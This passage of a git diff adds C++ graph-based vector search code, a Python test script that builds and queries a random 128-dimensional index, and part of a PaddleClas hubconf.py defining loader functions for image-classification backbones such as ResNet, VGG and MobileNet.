num_vertices = 
data->max_vertices(); + edges = std::vector(((size_t)num_vertices) << vertex_offset_shift); + edge_dist = std::vector(((size_t)num_vertices) << vertex_offset_shift); + edge_mutex = std::vector(num_vertices); + p_visited = new VisitedList(num_vertices + 5); + #ifdef OMP + int n_threads = 1; + #pragma omp parallel + #pragma omp master + { + n_threads = omp_get_num_threads(); + } + visited_pool.resize(n_threads); + for(int i = 0;i < n_threads;++i) + visited_pool[i] = new VisitedList(num_vertices + 5); + #endif + } + + void set_construct_pq_size(int size){ + construct_pq_size = size; + } + + std::vector edge_selection_filter_neighbor(std::vector& neighbor,idx_t vertex_id,int desired_size){ + std::vector filtered_neighbor; + std::vector dists(neighbor.size()); + for(int i = 0;i < dists.size();++i) + dists[i] = pair_distance(vertex_id,neighbor[i]); + std::vector idx(neighbor.size()); + for(int i = 0;i < idx.size();++i) + idx[i] = i; + std::sort(idx.begin(),idx.end(),[&](int a,int b){return dists[a] < dists[b];}); + for(int i = 0;i < idx.size();++i){ + dist_t cur_dist = dists[idx[i]]; + bool pass = true; + for(auto neighbor_id : filtered_neighbor){ + if(cur_dist > pair_distance(neighbor_id,neighbor[idx[i]])){ + pass = false; + break; + } + } + if(pass){ + filtered_neighbor.push_back(neighbor[idx[i]]); + if(filtered_neighbor.size() >= desired_size) + break; + }else{ + } + } + return std::move(filtered_neighbor); + } + + void add_vertex_lock(idx_t vertex_id,std::vector>& point){ + std::vector neighbor; + search_top_k_lock(point,construct_pq_size,neighbor); + auto offset = ((size_t)vertex_id) << vertex_offset_shift; + int num_neighbors = degree < neighbor.size() ? 
degree : neighbor.size(); + edge_mutex[vertex_id].lock(); + // TODO: + // it is possible to save this space --- edges[offset] + // by set the last number in the range as + // a large number - current degree + if(neighbor.size() >= degree) + neighbor = edge_selection_filter_neighbor(neighbor,vertex_id,degree); + edges[offset] = neighbor.size(); + + for(int i = 0;i < neighbor.size() && i < degree;++i){ + edges[offset + i + 1] = neighbor[i]; + } + edge_mutex[vertex_id].unlock(); + for(int i = 0;i < neighbor.size() && i < degree;++i){ + add_edge_lock(neighbor[i],vertex_id); + } + } + void add_vertex(idx_t vertex_id,std::vector>& point){ + std::vector neighbor; + search_top_k(point,construct_pq_size,neighbor); + auto offset = ((size_t)vertex_id) << vertex_offset_shift; + int num_neighbors = degree < neighbor.size() ? degree : neighbor.size(); + // TODO: + // it is possible to save this space --- edges[offset] + // by set the last number in the range as + // a large number - current degree + if(neighbor.size() >= degree){ + neighbor = edge_selection_filter_neighbor(neighbor,vertex_id,degree); + } + edges[offset] = neighbor.size(); + + for(int i = 0;i < neighbor.size() && i < degree;++i){ + edges[offset + i + 1] = neighbor[i]; + } + for(int i = 0;i < neighbor.size() && i < degree;++i){ + add_edge(neighbor[i],vertex_id); + } + } + + void astar_multi_start_search_lock(const std::vector>& query,int k,std::vector& result){ + std::priority_queue,std::vector>,std::greater>> q; + const int num_start_point = 1; + + auto converted_query = dist_type == 3 ? 
data->organize_point_mobius(query) : data->organize_point(query); + #ifdef OMP + int tid = omp_get_thread_num(); + auto& p_visited = visited_pool[tid]; + #endif + + p_visited->reset(); + auto tag = p_visited->curV; + for(int i = 0;i < num_start_point && i < data->curr_vertices();++i){ + auto start = search_start_point;//rand_gen() % data->curr_vertices(); + if(p_visited->mass[start] == tag) + continue; + p_visited->mass[start] = tag; + q.push(std::make_pair(pair_distance_naive(start,converted_query),start)); + } + std::priority_queue> topk; + const int max_step = 1000000; + bool found_min_node = false; + dist_t min_dist = 1e100; + int explore_cnt = 0; + for(int iter = 0;iter < max_step && !q.empty();++iter){ + auto now = q.top(); + if(topk.size() == k && topk.top().first < now.first){ + break; + } + ++explore_cnt; + min_dist = std::min(min_dist,now.first); + q.pop(); + if(ignore_startpoint == false || iter != 0) + topk.push(now); + if(topk.size() > k) + topk.pop(); + edge_mutex[now.second].lock(); + auto offset = ((size_t)now.second) << vertex_offset_shift; + auto degree = edges[offset]; + + for(int i = 0;i < degree;++i){ + auto start = edges[offset + i + 1]; + if(p_visited->mass[start] == tag) + continue; + p_visited->mass[start] = tag; + auto dist = pair_distance_naive(start,converted_query); + if(topk.empty() || dist < topk.top().first || topk.size() < k) + q.push(std::make_pair(dist,start)); + } + edge_mutex[now.second].unlock(); + } + total_explore_cnt += explore_cnt; + ++total_explore_times; + result.resize(topk.size()); + int i = result.size() - 1; + while(!topk.empty()){ + result[i] = (topk.top().second); + topk.pop(); + --i; + } + } + + void astar_no_heap_search(const std::vector>& query,std::vector& result){ + const int num_start_point = 1; + std::pair q_top = std::make_pair(10000000000,0); + auto converted_query = dist_type == 3 ? 
data->organize_point_mobius(query) : data->organize_point(query); + p_visited->reset(); + auto tag = p_visited->curV; + for(int i = 0;i < num_start_point && i < data->curr_vertices();++i){ + auto start = search_start_point;//rand_gen() % data->curr_vertices(); + p_visited->mass[start] = tag; + if(ignore_startpoint == false){ + q_top = (std::make_pair(pair_distance_naive(start,converted_query),start)); + }else{ + auto offset = ((size_t)start) << vertex_offset_shift; + auto degree = edges[offset]; + + for(int i = 1;i <= degree;++i){ + p_visited->mass[edges[offset + i]] = tag; + auto dis = pair_distance_naive(edges[offset + i],converted_query); + if(dis < q_top.first) + q_top = (std::make_pair(dis,start)); + } + } + } + const int max_step = 1000000; + bool found_min_node = false; + dist_t min_dist = 1e100; + int explore_cnt = 0; + for(int iter = 0;iter < max_step;++iter){ + ++explore_cnt; + auto offset = ((size_t)q_top.second) << vertex_offset_shift; + auto degree = edges[offset]; + + bool changed = false; + for(int i = 0;i < degree;++i){ + auto start = edges[offset + i + 1]; + if(p_visited->mass[start] == tag) + continue; + p_visited->mass[start] = tag; + auto dist = pair_distance_naive(start,converted_query); + if(dist < q_top.first){ + q_top = (std::make_pair(dist,start)); + changed = true; + } + } + if(changed == false) + break; + } + total_explore_cnt += explore_cnt; + ++total_explore_times; + result.resize(1); + result[0] = q_top.second; + } + + void astar_multi_start_search_with_score(const std::vector>& query,int k,std::vector& result,std::vector& score){ + std::priority_queue,std::vector>,std::greater>> q; + const int num_start_point = 1; + + auto converted_query = dist_type == 3 ? 
data->organize_point_mobius(query) : data->organize_point(query); + p_visited->reset(); + auto tag = p_visited->curV; + for(int i = 0;i < num_start_point && i < data->curr_vertices();++i){ + auto start = search_start_point;//rand_gen() % data->curr_vertices(); + if(p_visited->mass[start] == tag) + continue; + p_visited->mass[start] = tag; + q.push(std::make_pair(pair_distance_naive(start,converted_query),start)); + } + std::priority_queue> topk; + const int max_step = 1000000; + bool found_min_node = false; + dist_t min_dist = 1e100; + int explore_cnt = 0; + for(int iter = 0;iter < max_step && !q.empty();++iter){ + auto now = q.top(); + if(topk.size() == k && topk.top().first < now.first){ + break; + } + ++explore_cnt; + min_dist = std::min(min_dist,now.first); + q.pop(); + if(ignore_startpoint == false || iter != 0) + topk.push(now); + if(topk.size() > k) + topk.pop(); + auto offset = ((size_t)now.second) << vertex_offset_shift; + auto degree = edges[offset]; + + for(int i = 0;i < degree;++i){ + auto start = edges[offset + i + 1]; + if(p_visited->mass[start] == tag) + continue; + p_visited->mass[start] = tag; + auto dist = pair_distance_naive(start,converted_query); + if(topk.empty() || dist < topk.top().first || topk.size() < k) + q.push(std::make_pair(dist,start)); + } + } + total_explore_cnt += explore_cnt; + ++total_explore_times; + result.resize(topk.size()); + score.resize(topk.size()); + int i = result.size() - 1; + while(!topk.empty()){ + result[i] = (topk.top().second); + score[i] = -(topk.top().first); + topk.pop(); + --i; + } + } + + void astar_multi_start_search(const std::vector>& query,int k,std::vector& result){ + std::priority_queue,std::vector>,std::greater>> q; + const int num_start_point = 1; + + auto converted_query = dist_type == 3 ? 
data->organize_point_mobius(query) : data->organize_point(query); + p_visited->reset(); + auto tag = p_visited->curV; + for(int i = 0;i < num_start_point && i < data->curr_vertices();++i){ + auto start = search_start_point;//rand_gen() % data->curr_vertices(); + if(p_visited->mass[start] == tag) + continue; + p_visited->mass[start] = tag; + q.push(std::make_pair(pair_distance_naive(start,converted_query),start)); + } + std::priority_queue> topk; + const int max_step = 1000000; + bool found_min_node = false; + dist_t min_dist = 1e100; + int explore_cnt = 0; + for(int iter = 0;iter < max_step && !q.empty();++iter){ + auto now = q.top(); + if(topk.size() == k && topk.top().first < now.first){ + break; + } + ++explore_cnt; + min_dist = std::min(min_dist,now.first); + q.pop(); + if(ignore_startpoint == false || iter != 0) + topk.push(now); + if(topk.size() > k) + topk.pop(); + auto offset = ((size_t)now.second) << vertex_offset_shift; + auto degree = edges[offset]; + + for(int i = 0;i < degree;++i){ + auto start = edges[offset + i + 1]; + if(p_visited->mass[start] == tag) + continue; + p_visited->mass[start] = tag; + auto dist = pair_distance_naive(start,converted_query); + if(topk.empty() || dist < topk.top().first || topk.size() < k) + q.push(std::make_pair(dist,start)); + } + } + total_explore_cnt += explore_cnt; + ++total_explore_times; + result.resize(topk.size()); + int i = result.size() - 1; + while(!topk.empty()){ + result[i] = (topk.top().second); + topk.pop(); + --i; + } + } + + void search_top_k(const std::vector>& query,int k,std::vector& result){ + if(k == 1) + astar_no_heap_search(query,result); + else + astar_multi_start_search(query,k,result); + } + + void search_top_k_with_score(const std::vector>& query,int k,std::vector& result,std::vector& score){ + astar_multi_start_search_with_score(query,k,result,score); + } + + void search_top_k_lock(const std::vector>& query,int k,std::vector& result){ + astar_multi_start_search_lock(query,k,result); + } + + 
void print_stat(){ + auto n = data->max_vertices(); + size_t sum = 0; + std::vector histogram(2 * degree + 1,0); + for(size_t i = 0;i < n;++i){ + sum += edges[i << vertex_offset_shift]; + int tmp = edges[i << vertex_offset_shift]; + if(tmp > 2 * degree + 1) + fprintf(stderr,"[ERROR] node %zu has %d degree\n",i,tmp); + ++histogram[edges[i << vertex_offset_shift]]; + if(tmp != degree) + fprintf(stderr,"[INFO] %zu has degree %d\n",i,tmp); + } + fprintf(stderr,"[INFO] #vertices %zu, avg degree %f\n",n,sum * 1.0 / n); + std::unordered_set visited; + fprintf(stderr,"[INFO] degree histogram:\n"); + for(int i = 0;i <= 2 * degree + 1;++i) + fprintf(stderr,"[INFO] %d:\t%zu\n",i,histogram[i]); + + } + + void print_edges(int x){ + for(size_t i = 0;i < x;++i){ + size_t offset = i << vertex_offset_shift; + int degree = edges[offset]; + fprintf(stderr,"%d (%d): ",i,degree); + for(int j = 1;j <= degree;++j) + fprintf(stderr,"(%zu,%f) ",edges[offset + j],edge_dist[offset + j]); + fprintf(stderr,"\n"); + } + } + + void dump(std::string path = "bfsg.graph"){ + FILE* fp = fopen(path.c_str(),"wb"); + size_t num_vertices = data->max_vertices(); + fwrite(&edges[0],sizeof(edges[0]) * (num_vertices << vertex_offset_shift),1,fp); + fclose(fp); + } + + void load(std::string path = "bfsg.graph"){ + FILE* fp = fopen(path.c_str(),"rb"); + size_t num_vertices = data->max_vertices(); + auto cnt = fread(&edges[0],sizeof(edges[0]) * (num_vertices << vertex_offset_shift),1,fp); + fclose(fp); + } + + Data* get_data(){ + return data; + } + +}; + diff --git a/Smart_container/PaddleClas/deploy/vector_search/test.py b/Smart_container/PaddleClas/deploy/vector_search/test.py new file mode 100644 index 0000000..06951b4 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/test.py @@ -0,0 +1,34 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. 
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import numpy as np
+from interface import Graph_Index
+
+# Generate random samples: 100k float32 gallery vectors plus one query vector.
+index_vectors = np.random.rand(100000,128).astype(np.float32)
+query_vector = np.random.rand(128).astype(np.float32)
+index_docs = ["ID_"+str(i) for i in range(100000)]
+
+# Initialize the index structure and build it over the gallery.
+indexer = Graph_Index(dist_type="IP") # supports "IP" and "L2"
+indexer.build(gallery_vectors=index_vectors, gallery_docs=index_docs, pq_size=100, index_path='test')
+
+# Query: retrieve the top-10 docs for the query within the search budget.
+scores, docs = indexer.search(query=query_vector, return_k=10, search_budget=100)
+print(scores)
+print(docs)
+
+# Save the index to disk, then load it back.
+indexer.dump(index_path="test")
+indexer.load(index_path="test")
diff --git a/Smart_container/PaddleClas/hubconf.py b/Smart_container/PaddleClas/hubconf.py
new file mode 100644
index 0000000..b7f7674
--- /dev/null
+++ b/Smart_container/PaddleClas/hubconf.py
@@ -0,0 +1,788 @@
+# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+ +dependencies = ['paddle'] + +import paddle +import os +import sys + + +class _SysPathG(object): + """ + _SysPathG used to add/clean path for sys.path. Making sure minimal pkgs dependents by skiping parent dirs. + + __enter__ + add path into sys.path + __exit__ + clean user's sys.path to avoid unexpect behaviors + """ + + def __init__(self, path): + self.path = path + + def __enter__(self, ): + sys.path.insert(0, self.path) + + def __exit__(self, type, value, traceback): + _p = sys.path.pop(0) + assert _p == self.path, 'Make sure sys.path cleaning {} correctly.'.format( + self.path) + + +with _SysPathG(os.path.dirname(os.path.abspath(__file__)), ): + import ppcls + import ppcls.arch.backbone as backbone + + def ppclas_init(): + if ppcls.utils.logger._logger is None: + ppcls.utils.logger.init_logger() + + ppclas_init() + + def _load_pretrained_parameters(model, name): + url = 'https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/{}_pretrained.pdparams'.format( + name) + path = paddle.utils.download.get_weights_path_from_url(url) + model.set_state_dict(paddle.load(path)) + return model + + def alexnet(pretrained=False, **kwargs): + """ + AlexNet + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `AlexNet` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.AlexNet(**kwargs) + + return model + + def vgg11(pretrained=False, **kwargs): + """ + VGG11 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + stop_grad_layers: int=0. The parameters in blocks which index larger than `stop_grad_layers`, will be set `param.trainable=False` + Returns: + model: nn.Layer. Specific `VGG11` model depends on args. 
+ """ + kwargs.update({'pretrained': pretrained}) + model = backbone.VGG11(**kwargs) + + return model + + def vgg13(pretrained=False, **kwargs): + """ + VGG13 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + stop_grad_layers: int=0. The parameters in blocks which index larger than `stop_grad_layers`, will be set `param.trainable=False` + Returns: + model: nn.Layer. Specific `VGG13` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.VGG13(**kwargs) + + return model + + def vgg16(pretrained=False, **kwargs): + """ + VGG16 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + stop_grad_layers: int=0. The parameters in blocks which index larger than `stop_grad_layers`, will be set `param.trainable=False` + Returns: + model: nn.Layer. Specific `VGG16` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.VGG16(**kwargs) + + return model + + def vgg19(pretrained=False, **kwargs): + """ + VGG19 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + stop_grad_layers: int=0. The parameters in blocks which index larger than `stop_grad_layers`, will be set `param.trainable=False` + Returns: + model: nn.Layer. Specific `VGG19` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.VGG19(**kwargs) + + return model + + def resnet18(pretrained=False, **kwargs): + """ + ResNet18 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + input_image_channel: int=3. The number of input image channels + data_format: str='NCHW'. 
The data format of batch input images, should in ('NCHW', 'NHWC') + Returns: + model: nn.Layer. Specific `ResNet18` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNet18(**kwargs) + + return model + + def resnet34(pretrained=False, **kwargs): + """ + ResNet34 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + input_image_channel: int=3. The number of input image channels + data_format: str='NCHW'. The data format of batch input images, should in ('NCHW', 'NHWC') + Returns: + model: nn.Layer. Specific `ResNet34` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNet34(**kwargs) + + return model + + def resnet50(pretrained=False, **kwargs): + """ + ResNet50 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + input_image_channel: int=3. The number of input image channels + data_format: str='NCHW'. The data format of batch input images, should in ('NCHW', 'NHWC') + Returns: + model: nn.Layer. Specific `ResNet50` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNet50(**kwargs) + + return model + + def resnet101(pretrained=False, **kwargs): + """ + ResNet101 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + input_image_channel: int=3. The number of input image channels + data_format: str='NCHW'. The data format of batch input images, should in ('NCHW', 'NHWC') + Returns: + model: nn.Layer. Specific `ResNet101` model depends on args. 
+ """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNet101(**kwargs) + + return model + + def resnet152(pretrained=False, **kwargs): + """ + ResNet152 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + input_image_channel: int=3. The number of input image channels + data_format: str='NCHW'. The data format of batch input images, should in ('NCHW', 'NHWC') + Returns: + model: nn.Layer. Specific `ResNet152` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNet152(**kwargs) + + return model + + def squeezenet1_0(pretrained=False, **kwargs): + """ + SqueezeNet1_0 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `SqueezeNet1_0` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.SqueezeNet1_0(**kwargs) + + return model + + def squeezenet1_1(pretrained=False, **kwargs): + """ + SqueezeNet1_1 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `SqueezeNet1_1` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.SqueezeNet1_1(**kwargs) + + return model + + def densenet121(pretrained=False, **kwargs): + """ + DenseNet121 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + dropout: float=0. Probability of setting units to zero. + bn_size: int=4. The number of channals per group + Returns: + model: nn.Layer. Specific `DenseNet121` model depends on args. 
+ """ + kwargs.update({'pretrained': pretrained}) + model = backbone.DenseNet121(**kwargs) + + return model + + def densenet161(pretrained=False, **kwargs): + """ + DenseNet161 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + dropout: float=0. Probability of setting units to zero. + bn_size: int=4. The number of channals per group + Returns: + model: nn.Layer. Specific `DenseNet161` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.DenseNet161(**kwargs) + + return model + + def densenet169(pretrained=False, **kwargs): + """ + DenseNet169 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + dropout: float=0. Probability of setting units to zero. + bn_size: int=4. The number of channals per group + Returns: + model: nn.Layer. Specific `DenseNet169` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.DenseNet169(**kwargs) + + return model + + def densenet201(pretrained=False, **kwargs): + """ + DenseNet201 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + dropout: float=0. Probability of setting units to zero. + bn_size: int=4. The number of channals per group + Returns: + model: nn.Layer. Specific `DenseNet201` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.DenseNet201(**kwargs) + + return model + + def densenet264(pretrained=False, **kwargs): + """ + DenseNet264 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + dropout: float=0. Probability of setting units to zero. + bn_size: int=4. 
The number of channals per group + Returns: + model: nn.Layer. Specific `DenseNet264` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.DenseNet264(**kwargs) + + return model + + def inceptionv3(pretrained=False, **kwargs): + """ + InceptionV3 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `InceptionV3` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.InceptionV3(**kwargs) + + return model + + def inceptionv4(pretrained=False, **kwargs): + """ + InceptionV4 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `InceptionV4` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.InceptionV4(**kwargs) + + return model + + def googlenet(pretrained=False, **kwargs): + """ + GoogLeNet + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `GoogLeNet` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.GoogLeNet(**kwargs) + + return model + + def shufflenetv2_x0_25(pretrained=False, **kwargs): + """ + ShuffleNetV2_x0_25 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ShuffleNetV2_x0_25` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ShuffleNetV2_x0_25(**kwargs) + + return model + + def mobilenetv1(pretrained=False, **kwargs): + """ + MobileNetV1 + Args: + pretrained: bool=False. 
If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV1` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV1(**kwargs) + + return model + + def mobilenetv1_x0_25(pretrained=False, **kwargs): + """ + MobileNetV1_x0_25 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV1_x0_25` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV1_x0_25(**kwargs) + + return model + + def mobilenetv1_x0_5(pretrained=False, **kwargs): + """ + MobileNetV1_x0_5 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV1_x0_5` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV1_x0_5(**kwargs) + + return model + + def mobilenetv1_x0_75(pretrained=False, **kwargs): + """ + MobileNetV1_x0_75 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV1_x0_75` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV1_x0_75(**kwargs) + + return model + + def mobilenetv2_x0_25(pretrained=False, **kwargs): + """ + MobileNetV2_x0_25 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV2_x0_25` model depends on args. 
+ """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV2_x0_25(**kwargs) + + return model + + def mobilenetv2_x0_5(pretrained=False, **kwargs): + """ + MobileNetV2_x0_5 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV2_x0_5` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV2_x0_5(**kwargs) + + return model + + def mobilenetv2_x0_75(pretrained=False, **kwargs): + """ + MobileNetV2_x0_75 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV2_x0_75` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV2_x0_75(**kwargs) + + return model + + def mobilenetv2_x1_5(pretrained=False, **kwargs): + """ + MobileNetV2_x1_5 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV2_x1_5` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV2_x1_5(**kwargs) + + return model + + def mobilenetv2_x2_0(pretrained=False, **kwargs): + """ + MobileNetV2_x2_0 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV2_x2_0` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV2_x2_0(**kwargs) + + return model + + def mobilenetv3_large_x0_35(pretrained=False, **kwargs): + """ + MobileNetV3_large_x0_35 + Args: + pretrained: bool=False. 
If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x0_35` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_large_x0_35(**kwargs) + + return model + + def mobilenetv3_large_x0_5(pretrained=False, **kwargs): + """ + MobileNetV3_large_x0_5 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x0_5` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_large_x0_5(**kwargs) + + return model + + def mobilenetv3_large_x0_75(pretrained=False, **kwargs): + """ + MobileNetV3_large_x0_75 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x0_75` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_large_x0_75(**kwargs) + + return model + + def mobilenetv3_large_x1_0(pretrained=False, **kwargs): + """ + MobileNetV3_large_x1_0 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x1_0` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_large_x1_0(**kwargs) + + return model + + def mobilenetv3_large_x1_25(pretrained=False, **kwargs): + """ + MobileNetV3_large_x1_25 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. 
Specific `MobileNetV3_large_x1_25` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_large_x1_25(**kwargs) + + return model + + def mobilenetv3_small_x0_35(pretrained=False, **kwargs): + """ + MobileNetV3_small_x0_35 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x0_35` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_small_x0_35(**kwargs) + + return model + + def mobilenetv3_small_x0_5(pretrained=False, **kwargs): + """ + MobileNetV3_small_x0_5 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x0_5` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_small_x0_5(**kwargs) + + return model + + def mobilenetv3_small_x0_75(pretrained=False, **kwargs): + """ + MobileNetV3_small_x0_75 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x0_75` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_small_x0_75(**kwargs) + + return model + + def mobilenetv3_small_x1_0(pretrained=False, **kwargs): + """ + 